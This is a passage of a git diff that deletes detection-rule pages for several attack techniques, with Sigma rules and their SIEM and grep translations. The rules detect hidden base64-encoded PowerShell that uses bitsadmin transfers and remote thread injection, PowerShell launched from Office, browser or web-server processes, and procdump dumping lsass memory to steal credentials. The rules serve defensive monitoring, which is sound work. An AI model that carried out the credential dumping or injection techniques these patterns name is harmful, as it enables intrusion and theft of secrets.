CommandLine="*bQBlAG0AbQBvAHYAZQ*" OR CommandLine="*bWVtbW92Z*" OR CommandLine="*ZW1tb3Zl*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\powershell.exe" CommandLine="* hidden *" CommandLine IN ["*AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA*", "*aXRzYWRtaW4gL3RyYW5zZmVy*", "*IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA*", "*JpdHNhZG1pbiAvdHJhbnNmZX*", "*YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg*", "*Yml0c2FkbWluIC90cmFuc2Zlc*", "*AGMAaAB1AG4AawBfAHMAaQB6AGUA*", "*JABjAGgAdQBuAGsAXwBzAGkAegBlA*", "*JGNodW5rX3Npem*", "*QAYwBoAHUAbgBrAF8AcwBpAHoAZQ*", "*RjaHVua19zaXpl*", "*Y2h1bmtfc2l6Z*", "*AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A*", "*kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg*", "*lPLkNvbXByZXNzaW9u*", "*SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA*", "*SU8uQ29tcHJlc3Npb2*", "*Ty5Db21wcmVzc2lvb*", "*AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ*", "*kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA*", "*lPLk1lbW9yeVN0cmVhb*", "*SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A*", "*SU8uTWVtb3J5U3RyZWFt*", "*Ty5NZW1vcnlTdHJlYW*", "*4ARwBlAHQAQwBoAHUAbgBrA*", "*5HZXRDaHVua*", "*AEcAZQB0AEMAaAB1AG4Aaw*", "*LgBHAGUAdABDAGgAdQBuAGsA*", "*LkdldENodW5r*", "*R2V0Q2h1bm*", "*AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A*", "*QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA*", "*RIUkVBRF9JTkZPNj*", "*SFJFQURfSU5GTzY0*", "*VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA*", "*VEhSRUFEX0lORk82N*", "*AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA*", "*cmVhdGVSZW1vdGVUaHJlYW*", "*MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA*", "*NyZWF0ZVJlbW90ZVRocmVhZ*", "*Q3JlYXRlUmVtb3RlVGhyZWFk*", "*QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA*", "*0AZQBtAG0AbwB2AGUA*", "*1lbW1vdm*", "*AGUAbQBtAG8AdgBlA*", "*bQBlAG0AbQBvAHYAZQ*", "*bWVtbW92Z*", "*ZW1tb3Zl*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\powershell\.exe)(?=.*.* hidden .*)(?=.*(?:.*.*AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA.*|.*.*aXRzYWRtaW4gL3RyYW5zZmVy.*|.*.*IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA.*|.*.*JpdHNhZG1pbiAvdHJhbnNmZX.*|.*.*YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg.*|.*.*Yml0c2FkbWluIC90cmFuc2Zlc.*|.*.*AGMAaAB1AG4AawBfAHMAaQB6AGUA.*|.*.*JABjAGgAdQBuAGsAXwBzAGkAegBlA.*|.*.*JGNodW5rX3Npem.*|.*.*QAYwBoAHUAbgBrAF8AcwBpAHoAZQ.*|.*.*RjaHVua19zaXpl.*|.*.*Y2h1bmtfc2l6Z.*|.*.*AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A.*|.*.*kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg.*|.*.*lPLkNvbXByZXNzaW9u.*|.*.*SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA.*|.*.*SU8uQ29tcHJlc3Npb2.*|.*.*Ty5Db21wcmVzc2lvb.*|.*.*AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ.*|.*.*kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA.*|.*.*lPLk1lbW9yeVN0cmVhb.*|.*.*SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A.*|.*.*SU8uTWVtb3J5U3RyZWFt.*|.*.*Ty5NZW1vcnlTdHJlYW.*|.*.*4ARwBlAHQAQwBoAHUAbgBrA.*|.*.*5HZXRDaHVua.*|.*.*AEcAZQB0AEMAaAB1AG4Aaw.*|.*.*LgBHAGUAdABDAGgAdQBuAGsA.*|.*.*LkdldENodW5r.*|.*.*R2V0Q2h1bm.*|.*.*AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A.*|.*.*QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA.*|.*.*RIUkVBRF9JTkZPNj.*|.*.*SFJFQURfSU5GTzY0.*|.*.*VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA.*|.*.*VEhSRUFEX0lORk82N.*|.*.*AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA.*|.*.*cmVhdGVSZW1vdGVUaHJlYW.*|.*.*MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA.*|.*.*NyZWF0ZVJlbW90ZVRocmVhZ.*|.*.*Q3JlYXRlUmVtb3RlVGhyZWFk.*|.*.*QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA.*|.*.*0AZQBtAG0AbwB2AGUA.*|.*.*1lbW1vdm.*|.*.*AGUAbQBtAG8AdgBlA.*|.*.*bQBlAG0AbQBvAHYAZQ.*|.*.*bWVtbW92Z.*|.*.*ZW1tb3Zl.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_parent_combo.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_parent_combo.md
deleted file mode 100644
index deccd9b..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_parent_combo.md
+++ /dev/null
@@ -1,184 +0,0 @@
-| Title                    | Suspicious PowerShell Invocation Based on Parent Process       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious powershell invocations from interpreters or unusual programs |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Microsoft Operations Manager (MOM)</li><li>Other scripts</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.carbonblack.com/2017/03/15/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/](https://www.carbonblack.com/2017/03/15/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious PowerShell Invocation Based on Parent Process
-id: 95eadcb2-92e4-4ed1-9031-92547773a6db
-status: experimental
-description: Detects suspicious powershell invocations from interpreters or unusual programs
-author: Florian Roth
-date: 2019/01/16
-references:
-    - https://www.carbonblack.com/2017/03/15/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage:
-            - '*\wscript.exe'
-            - '*\cscript.exe'
-        Image:
-            - '*\powershell.exe'
-    falsepositive:
-        CurrentDirectory: '*\Health Service State\\*'
-    condition: selection and not falsepositive
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Microsoft Operations Manager (MOM)
-    - Other scripts
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and (($_.message -match "ParentImage.*.*\\wscript.exe" -or $_.message -match "ParentImage.*.*\\cscript.exe") -and ($_.message -match "Image.*.*\\powershell.exe")) -and  -not ($_.message -match "CurrentDirectory.*.*\\Health Service State\\.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.ParentImage.keyword:(*\\wscript.exe OR *\\cscript.exe) AND winlog.event_data.Image.keyword:(*\\powershell.exe)) AND (NOT (winlog.event_data.CurrentDirectory.keyword:*\\Health\ Service\ State\\*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/95eadcb2-92e4-4ed1-9031-92547773a6db <<EOF
-{
-  "metadata": {
-    "title": "Suspicious PowerShell Invocation Based on Parent Process",
-    "description": "Detects suspicious powershell invocations from interpreters or unusual programs",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "((winlog.event_data.ParentImage.keyword:(*\\\\wscript.exe OR *\\\\cscript.exe) AND winlog.event_data.Image.keyword:(*\\\\powershell.exe)) AND (NOT (winlog.event_data.CurrentDirectory.keyword:*\\\\Health\\ Service\\ State\\\\*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.ParentImage.keyword:(*\\\\wscript.exe OR *\\\\cscript.exe) AND winlog.event_data.Image.keyword:(*\\\\powershell.exe)) AND (NOT (winlog.event_data.CurrentDirectory.keyword:*\\\\Health\\ Service\\ State\\\\*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious PowerShell Invocation Based on Parent Process'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((ParentImage.keyword:(*\\wscript.exe *\\cscript.exe) AND Image.keyword:(*\\powershell.exe)) AND (NOT (CurrentDirectory.keyword:*\\Health Service State\\*)))
-```
-
-
-### splunk
-    
-```
-(((ParentImage="*\\wscript.exe" OR ParentImage="*\\cscript.exe") (Image="*\\powershell.exe")) NOT (CurrentDirectory="*\\Health Service State\\*")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (ParentImage IN ["*\\wscript.exe", "*\\cscript.exe"] Image IN ["*\\powershell.exe"])  -(CurrentDirectory="*\\Health Service State\\*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*(?:.*.*\wscript\.exe|.*.*\cscript\.exe))(?=.*(?:.*.*\powershell\.exe))))(?=.*(?!.*(?:.*(?=.*.*\Health Service State\\.*)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_parent_process.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_parent_process.md
deleted file mode 100644
index 57a707f..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_powershell_parent_process.md
+++ /dev/null
@@ -1,209 +0,0 @@
-| Title                    | Suspicious PowerShell Parent Process       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a suspicious parents of powershell.exe |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Other scripts</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26](https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26)</li></ul>  |
-| **Author**               | Teymur Kheirkhabarov, Harish Segar (rule) |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious PowerShell Parent Process
-id: 754ed792-634f-40ae-b3bc-e0448d33f695
-description: Detects a suspicious parents of powershell.exe
-status: experimental
-references:
-    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26
-author: Teymur Kheirkhabarov, Harish Segar (rule)
-date: 2020/03/20
-tags:
-    - attack.execution
-    - attack.t1086
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection_image1:
-        - ParentImage|endswith:
-            - '\mshta.exe'
-            - '\rundll32.exe'
-            - '\regsvr32.exe'
-            - '\services.exe'
-            - '\winword.exe'
-            - '\wmiprvse.exe'
-            - '\powerpnt.exe'
-            - '\excel.exe'
-            - '\msaccess.exe'
-            - '\mspub.exe'
-            - '\visio.exe'
-            - '\outlook.exe'
-            - '\amigo.exe'
-            - '\chrome.exe'
-            - '\firefox.exe'
-            - '\iexplore.exe'
-            - '\microsoftedgecp.exe'
-            - '\microsoftedge.exe'
-            - '\browser.exe'
-            - '\vivaldi.exe'
-            - '\safari.exe'
-            - '\sqlagent.exe'
-            - '\sqlserver.exe'
-            - '\sqlservr.exe'
-            - '\w3wp.exe'
-            - '\httpd.exe'
-            - '\nginx.exe'
-            - '\php-cgi.exe'
-            - '\jbosssvc.exe'
-            - "MicrosoftEdgeSH.exe"
-        - ParentImage|contains: "tomcat"
-    selection_powershell:
-        - CommandLine|contains:
-              - "powershell"
-              - "pwsh"
-        - Description: "Windows PowerShell"
-        - Product: "PowerShell Core 6"
-    condition: all of them
-falsepositives:
-    - Other scripts
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and (($_.message -match "ParentImage.*.*\\mshta.exe" -or $_.message -match "ParentImage.*.*\\rundll32.exe" -or $_.message -match "ParentImage.*.*\\regsvr32.exe" -or $_.message -match "ParentImage.*.*\\services.exe" -or $_.message -match "ParentImage.*.*\\winword.exe" -or $_.message -match "ParentImage.*.*\\wmiprvse.exe" -or $_.message -match "ParentImage.*.*\\powerpnt.exe" -or $_.message -match "ParentImage.*.*\\excel.exe" -or $_.message -match "ParentImage.*.*\\msaccess.exe" -or $_.message -match "ParentImage.*.*\\mspub.exe" -or $_.message -match "ParentImage.*.*\\visio.exe" -or $_.message -match "ParentImage.*.*\\outlook.exe" -or $_.message -match "ParentImage.*.*\\amigo.exe" -or $_.message -match "ParentImage.*.*\\chrome.exe" -or $_.message -match "ParentImage.*.*\\firefox.exe" -or $_.message -match "ParentImage.*.*\\iexplore.exe" -or $_.message -match "ParentImage.*.*\\microsoftedgecp.exe" -or $_.message -match "ParentImage.*.*\\microsoftedge.exe" -or $_.message -match "ParentImage.*.*\\browser.exe" -or $_.message -match "ParentImage.*.*\\vivaldi.exe" -or $_.message -match "ParentImage.*.*\\safari.exe" -or $_.message -match "ParentImage.*.*\\sqlagent.exe" -or $_.message -match "ParentImage.*.*\\sqlserver.exe" -or $_.message -match "ParentImage.*.*\\sqlservr.exe" -or $_.message -match "ParentImage.*.*\\w3wp.exe" -or $_.message -match "ParentImage.*.*\\httpd.exe" -or $_.message -match "ParentImage.*.*\\nginx.exe" -or $_.message -match "ParentImage.*.*\\php-cgi.exe" -or $_.message -match "ParentImage.*.*\\jbosssvc.exe" -or $_.message -match "ParentImage.*.*MicrosoftEdgeSH.exe") -or $_.message -match "ParentImage.*.*tomcat.*") -and (($_.message -match "CommandLine.*.*powershell.*" -or $_.message -match "CommandLine.*.*pwsh.*") -or $_.message -match "Description.*Windows PowerShell" -or $_.message -match "Product.*PowerShell Core 6")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.ParentImage.keyword:(*\\mshta.exe OR *\\rundll32.exe OR *\\regsvr32.exe OR *\\services.exe OR *\\winword.exe OR *\\wmiprvse.exe OR *\\powerpnt.exe OR *\\excel.exe OR *\\msaccess.exe OR *\\mspub.exe OR *\\visio.exe OR *\\outlook.exe OR *\\amigo.exe OR *\\chrome.exe OR *\\firefox.exe OR *\\iexplore.exe OR *\\microsoftedgecp.exe OR *\\microsoftedge.exe OR *\\browser.exe OR *\\vivaldi.exe OR *\\safari.exe OR *\\sqlagent.exe OR *\\sqlserver.exe OR *\\sqlservr.exe OR *\\w3wp.exe OR *\\httpd.exe OR *\\nginx.exe OR *\\php\-cgi.exe OR *\\jbosssvc.exe OR *MicrosoftEdgeSH.exe) OR winlog.event_data.ParentImage.keyword:*tomcat*) AND (winlog.event_data.CommandLine.keyword:(*powershell* OR *pwsh*) OR winlog.event_data.Description:"Windows\ PowerShell" OR Product:"PowerShell\ Core\ 6"))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/754ed792-634f-40ae-b3bc-e0448d33f695 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious PowerShell Parent Process",
-    "description": "Detects a suspicious parents of powershell.exe",
-    "tags": [
-      "attack.execution",
-      "attack.t1086"
-    ],
-    "query": "((winlog.event_data.ParentImage.keyword:(*\\\\mshta.exe OR *\\\\rundll32.exe OR *\\\\regsvr32.exe OR *\\\\services.exe OR *\\\\winword.exe OR *\\\\wmiprvse.exe OR *\\\\powerpnt.exe OR *\\\\excel.exe OR *\\\\msaccess.exe OR *\\\\mspub.exe OR *\\\\visio.exe OR *\\\\outlook.exe OR *\\\\amigo.exe OR *\\\\chrome.exe OR *\\\\firefox.exe OR *\\\\iexplore.exe OR *\\\\microsoftedgecp.exe OR *\\\\microsoftedge.exe OR *\\\\browser.exe OR *\\\\vivaldi.exe OR *\\\\safari.exe OR *\\\\sqlagent.exe OR *\\\\sqlserver.exe OR *\\\\sqlservr.exe OR *\\\\w3wp.exe OR *\\\\httpd.exe OR *\\\\nginx.exe OR *\\\\php\\-cgi.exe OR *\\\\jbosssvc.exe OR *MicrosoftEdgeSH.exe) OR winlog.event_data.ParentImage.keyword:*tomcat*) AND (winlog.event_data.CommandLine.keyword:(*powershell* OR *pwsh*) OR winlog.event_data.Description:\"Windows\\ PowerShell\" OR Product:\"PowerShell\\ Core\\ 6\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.ParentImage.keyword:(*\\\\mshta.exe OR *\\\\rundll32.exe OR *\\\\regsvr32.exe OR *\\\\services.exe OR *\\\\winword.exe OR *\\\\wmiprvse.exe OR *\\\\powerpnt.exe OR *\\\\excel.exe OR *\\\\msaccess.exe OR *\\\\mspub.exe OR *\\\\visio.exe OR *\\\\outlook.exe OR *\\\\amigo.exe OR *\\\\chrome.exe OR *\\\\firefox.exe OR *\\\\iexplore.exe OR *\\\\microsoftedgecp.exe OR *\\\\microsoftedge.exe OR *\\\\browser.exe OR *\\\\vivaldi.exe OR *\\\\safari.exe OR *\\\\sqlagent.exe OR *\\\\sqlserver.exe OR *\\\\sqlservr.exe OR *\\\\w3wp.exe OR *\\\\httpd.exe OR *\\\\nginx.exe OR *\\\\php\\-cgi.exe OR *\\\\jbosssvc.exe OR *MicrosoftEdgeSH.exe) OR winlog.event_data.ParentImage.keyword:*tomcat*) AND (winlog.event_data.CommandLine.keyword:(*powershell* OR *pwsh*) OR winlog.event_data.Description:\"Windows\\ PowerShell\" OR Product:\"PowerShell\\ Core\\ 6\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious PowerShell Parent Process'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((ParentImage.keyword:(*\\mshta.exe *\\rundll32.exe *\\regsvr32.exe *\\services.exe *\\winword.exe *\\wmiprvse.exe *\\powerpnt.exe *\\excel.exe *\\msaccess.exe *\\mspub.exe *\\visio.exe *\\outlook.exe *\\amigo.exe *\\chrome.exe *\\firefox.exe *\\iexplore.exe *\\microsoftedgecp.exe *\\microsoftedge.exe *\\browser.exe *\\vivaldi.exe *\\safari.exe *\\sqlagent.exe *\\sqlserver.exe *\\sqlservr.exe *\\w3wp.exe *\\httpd.exe *\\nginx.exe *\\php\-cgi.exe *\\jbosssvc.exe *MicrosoftEdgeSH.exe) OR ParentImage.keyword:*tomcat*) AND (CommandLine.keyword:(*powershell* *pwsh*) OR Description:"Windows PowerShell" OR Product:"PowerShell Core 6"))
-```
-
-
-### splunk
-    
-```
-(((ParentImage="*\\mshta.exe" OR ParentImage="*\\rundll32.exe" OR ParentImage="*\\regsvr32.exe" OR ParentImage="*\\services.exe" OR ParentImage="*\\winword.exe" OR ParentImage="*\\wmiprvse.exe" OR ParentImage="*\\powerpnt.exe" OR ParentImage="*\\excel.exe" OR ParentImage="*\\msaccess.exe" OR ParentImage="*\\mspub.exe" OR ParentImage="*\\visio.exe" OR ParentImage="*\\outlook.exe" OR ParentImage="*\\amigo.exe" OR ParentImage="*\\chrome.exe" OR ParentImage="*\\firefox.exe" OR ParentImage="*\\iexplore.exe" OR ParentImage="*\\microsoftedgecp.exe" OR ParentImage="*\\microsoftedge.exe" OR ParentImage="*\\browser.exe" OR ParentImage="*\\vivaldi.exe" OR ParentImage="*\\safari.exe" OR ParentImage="*\\sqlagent.exe" OR ParentImage="*\\sqlserver.exe" OR ParentImage="*\\sqlservr.exe" OR ParentImage="*\\w3wp.exe" OR ParentImage="*\\httpd.exe" OR ParentImage="*\\nginx.exe" OR ParentImage="*\\php-cgi.exe" OR ParentImage="*\\jbosssvc.exe" OR ParentImage="*MicrosoftEdgeSH.exe") OR ParentImage="*tomcat*") ((CommandLine="*powershell*" OR CommandLine="*pwsh*") OR Description="Windows PowerShell" OR Product="PowerShell Core 6"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (ParentImage IN ["*\\mshta.exe", "*\\rundll32.exe", "*\\regsvr32.exe", "*\\services.exe", "*\\winword.exe", "*\\wmiprvse.exe", "*\\powerpnt.exe", "*\\excel.exe", "*\\msaccess.exe", "*\\mspub.exe", "*\\visio.exe", "*\\outlook.exe", "*\\amigo.exe", "*\\chrome.exe", "*\\firefox.exe", "*\\iexplore.exe", "*\\microsoftedgecp.exe", "*\\microsoftedge.exe", "*\\browser.exe", "*\\vivaldi.exe", "*\\safari.exe", "*\\sqlagent.exe", "*\\sqlserver.exe", "*\\sqlservr.exe", "*\\w3wp.exe", "*\\httpd.exe", "*\\nginx.exe", "*\\php-cgi.exe", "*\\jbosssvc.exe", "*MicrosoftEdgeSH.exe"] OR ParentImage="*tomcat*") (CommandLine IN ["*powershell*", "*pwsh*"] OR Description="Windows PowerShell" OR Product="PowerShell Core 6"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?:.*(?:.*.*\mshta\.exe|.*.*\rundll32\.exe|.*.*\regsvr32\.exe|.*.*\services\.exe|.*.*\winword\.exe|.*.*\wmiprvse\.exe|.*.*\powerpnt\.exe|.*.*\excel\.exe|.*.*\msaccess\.exe|.*.*\mspub\.exe|.*.*\visio\.exe|.*.*\outlook\.exe|.*.*\amigo\.exe|.*.*\chrome\.exe|.*.*\firefox\.exe|.*.*\iexplore\.exe|.*.*\microsoftedgecp\.exe|.*.*\microsoftedge\.exe|.*.*\browser\.exe|.*.*\vivaldi\.exe|.*.*\safari\.exe|.*.*\sqlagent\.exe|.*.*\sqlserver\.exe|.*.*\sqlservr\.exe|.*.*\w3wp\.exe|.*.*\httpd\.exe|.*.*\nginx\.exe|.*.*\php-cgi\.exe|.*.*\jbosssvc\.exe|.*.*MicrosoftEdgeSH\.exe)|.*.*tomcat.*)))(?=.*(?:.*(?:.*(?:.*.*powershell.*|.*.*pwsh.*)|.*Windows PowerShell|.*PowerShell Core 6))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_procdump.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_procdump.md
deleted file mode 100644
index 9bf8514..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_procdump.md
+++ /dev/null
@@ -1,189 +0,0 @@
-| Title                    | Suspicious Use of Procdump       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unlikely, because no one should dump an lsass process memory</li><li>Another tool that uses the command line switches of Procdump</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[Internal Research](Internal Research)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>car.2013-05-009</li><li>attack.t1003.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Use of Procdump
-id: 5afee48e-67dd-4e03-a783-f74259dcf998
-description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.
-status: experimental
-references:
-    - Internal Research
-author: Florian Roth
-date: 2018/10/30
-modified: 2019/10/14
-tags:
-    - attack.defense_evasion
-    - attack.t1036
-    - attack.credential_access
-    - attack.t1003
-    - car.2013-05-009
-    - attack.t1003.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        CommandLine:
-            - '* -ma *'
-    selection2:
-        CommandLine:
-            - '* lsass*'
-    selection3:
-        CommandLine:
-            - '* -ma ls*'
-    condition: ( selection1 and selection2 ) or selection3
-falsepositives:
-    - Unlikely, because no one should dump an lsass process memory
-    - Another tool that uses the command line switches of Procdump
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.ID -eq "1" -and ($_.message -match "CommandLine.*.* -ma .*") -and ($_.message -match "CommandLine.*.* lsass.*")) -or ($_.message -match "CommandLine.*.* -ma ls.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.CommandLine.keyword:(*\ \-ma\ *) AND winlog.event_data.CommandLine.keyword:(*\ lsass*)) OR winlog.event_data.CommandLine.keyword:(*\ \-ma\ ls*))
-```
-
-
-### xpack-watcher
-    
-```
